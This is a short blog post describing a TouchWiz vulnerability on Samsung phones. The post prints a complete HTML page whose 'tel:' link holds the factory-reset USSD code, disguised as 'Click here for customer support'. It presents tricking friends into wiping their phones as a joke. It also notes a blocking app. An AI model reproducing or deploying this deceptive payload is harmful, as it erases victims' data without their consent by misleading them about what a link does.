Trick Samsung Device to Hard Reset

Posted on Updated on

There seems to be a vulnerability in TouchWiz, Samsung’s touch interface. It appears that the "tel" type in the "<a>" tag will not prompt you for confirmation if the number being dialed is a system command.

For instance, because we love humor and the misfortune of others, we have this HTML page:

<html>
   <head></head>
   <body>
      <a href='tel:*2767*3855%23'>Click here for customer support</a>
   </body>
</html>

When our dear friend on their Samsung device clicks the link, they will hard-reset their phone with no confirmation. It seems that it will only prompt you if the number is one that will cost you $$$ for making a call.

WARNING – Feeling adventurous and want to try it out on your self? Do it at your own risk, it will erase all data on your phone and revert it to factory settings.

Some crazy iPhone fanboi is offering up the link for all to click on 🙂

***** UPDATE *****
The H-Online reported that there is a new app on the Google Play that will intercept and prevent hard-resets from the above exploit. The app is called NoTelUrl developed by Jörg Voss.

Advertisements

Leave a Comment

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s